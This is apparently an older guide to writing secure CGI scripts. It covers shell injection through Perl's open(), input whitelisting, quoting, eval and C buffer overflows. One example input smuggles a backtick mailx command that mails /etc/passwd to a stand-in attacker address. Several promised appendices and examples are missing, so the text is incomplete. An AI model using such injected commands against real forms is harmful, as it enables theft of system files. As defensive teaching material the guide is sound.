[Because we need to use all of the different quote characters within many of the examples, literal strings are not surrounded by quotes; instead user-input strings are shown in a , and program strings are shown with a dark background and green text.]
Contents: Shell Game Other Problems Summary Appendix A: Dangerous Characters Appendix B: Unsafe Operations Appendix C: Unsafe Library Functions Shell Game We'll start with a few examples of how you can get into trouble. This bit of perl code is intended to search for files in a specific directory and find any that match a user-provided search specification:
open("/bin/ls /data/cardfiles | grep $searchspec |");
Suppose the user enters one of the following onto the form for the above searchspec field:
/bin/ls /data/cardfiles | grep blah `/bin/mailx -s anothervictim evilperson@evildomain.org < /etc/passwd`
Most examples of security problems in CGIs can be traced to the fact that a shell is unexpectedly started and handed some data from the HTML form. And in almost every case, the shell is started simply as a convenient way to start some other outside program. (Our examples focus on just one way this can happen, a list of possible trouble spots are found in Appendix B.) This brings us to one of the most important recommendations here:
Avoid starting external programs where possible. It is always best if you can build all of the needed functionality into your CGI. Even if you start the external program in a secure way, it's possible that the external program could manage to do something insecure that you didn't expect.
But sometimes you have to start external programs. Can it be done securely? The best way to do this is to make sure the user data is clean of any trouble. In fact, the best way to make any CGI secure is to completely isolate the input data from any possible abuse. Suppose a field on the form has just three possible values, Yes, No, and Maybe. You could simply compare the input value to each of these three values, and if doesn't match, you immediately generate an error and give up. If there is an exact match, then you know the value is completely safe to use.
As an aside, you can't rely on the HTML form to provide this constraint. If you have a pulldown menu that contains a list of values, it is still possible for a malicious user to submit other values you don't list. They can simply copy your HTML form, and edit the values; this will work for both the GET and POST methods. Also note that a malicious user can simply encode things directly in the URL for use with the GET method, and because of how most CGI libraries work, it will probably work even if the author was originally using POST.
Unfortunately it is not always possible to constrain your input so tightly. For instance in a search form, you usually can't predict every reasonable search term in advance. If you can't constrain the input, and you have to start an outside program, your best bet is to avoid using the shell to start the outside program. If you are just starting the outside program, and the current one is finished, you can just use exec(), which replaces the current program with the new one. This command exists (in one form or another) in shell, perl, and C (note that care must be used in perl; see Appendix B). In all three languages, you'll be protected from immediate harm (but you still have to worry about what the new program does with the data). But if you are opening a pipe to a command (as in the first example), then coding this is a bit trickier. You need to understand pipe(), fork(), and exec(), and a complete description is beyond the scope of this article. Perl will do a fork() and exec() for you with the system() function (note that this doesn't set up piped I/O), however care must be taken to use the correct form, otherwise a shell may still be used. For more on this, see the line item for the system() function in Appendix B, in the perl section.
If you aren't a system programmer, or if you have particularly complex file redirection needs, then it may be difficult to avoid the temptation to let the shell start your external program. Even if you do use exec, if you don't control the sources to the outside program, you still aren't protected. So what else can we do to stay safe?
An adequate (but not great) solution is to attempt to strip out all of the dangerous characters. The problem with this is that the list is long, and you might miss something. Worse, which characters are dangerous depends on exactly what you are doing, and which language(s) you are working with. Consider this example:
open("grep $name /data/phonebook |");
If you can identify every dangerous character and strip them out, that's great. In some cases, you can even simply limit the input to alphanumerics, which will provide good protection. But suppose the input is supposed to include some of these dangerous characters? If you can't filter them out, the next best thing is to quote the characters so that they won't be dangerous anymore:
open("grep '$name' /data/phonebook |");
A simpler way to handle quoting is to use a backslash in front of each problem character, because it's a more consistent approach (there's no bizarre exception like quoting the single quote above). You just have to remember to backslash everything that might be a problem (See Appendix A). In many cases, you can even put a backslash in front of every character (including normal characters) and get the protection you want without causing any problems. Again though, if the string goes through additional evaluations, you have to add quoting for each evaluation, and this becomes very complex (2n-1 backslashes are needed)
Note that with perl, if there are no shell special characters in an open command, then it won't use the shell to interpret the command. Unfortunately backslashses are not counted as special characters, so if you protect through backslashing, the backslashes may not be stripped depending on how perl choses to execute it. And, you can't rely on perl not using the shell, because if user input contains special characters, then it may behave differently than it does in your tests. Other Problems That about covers all the different approaches to making yourself safe from shells. But this is only one way in which you can get into trouble.
Any interpreted language can expose the input string to unexpected evaluations. Normally, in interpreted languages, simply having the information stored in a variable offers some protection from problems. For instance, in perl, $total = $input*1.15 + 37.50; can not be subverted by putting dangerous characters into the $input variable, because when perl replaces the variable with its value, it has already finished with checking for backticks and things like that. This is also true if /bin/sh is your scripting language. However, both of these languages have an eval statement, which causes a second pass of evaluation to occur. Here's an example of how this can be handy. Part of the user input involves selecting a sorting function, which is stored in the variable $howsort:
@newlist = eval sort $howsort @oldlist;
Compiled languages that use the C library functions suffer from a problem of their own. Because many of the library functions don't do bounds checking on input strings, it is possible to overflow a buffer while reading input, and overwrite the stack, and cause the program to execute machine code that was supplied by the user. So a user can send arbitrarily long query strings to your program, hoping to overflow the buffer and run something of their own. Contrary to popular belief, access to source code is not required, the evildoer just has to keep trying different length inputs.
This problem can be avoided by taking care to not let buffers overflow. If you are using read() in loop, just add an exit condition for hitting the end of the buffer. For the library functions, there are safe forms of most functions. Even if there aren't, you only have to check that a string is short enough before using it in an unsafe function. Appendix C lists some unsafe functions, and their safe equivalents.
Even if you avoid all of the above general case pitfalls, there's still room for evil to occur. There are a great number of application-specific holes that you could leave if you aren't careful. Here's some examples:
Appendix B: Possibly Unsafe Operations The following problems should NOT be considered an exhaustive list.
C
Simply using these functions doesn't make you safe, you have to make sure the size limits you use are set to match the buffer sizes you have (minus one, usually). For example, it is tempting to use read or fread (not listed here because they're generally safe), with the size set to the value from the Content-Length HTTP field, but this can lead to buffer overrun.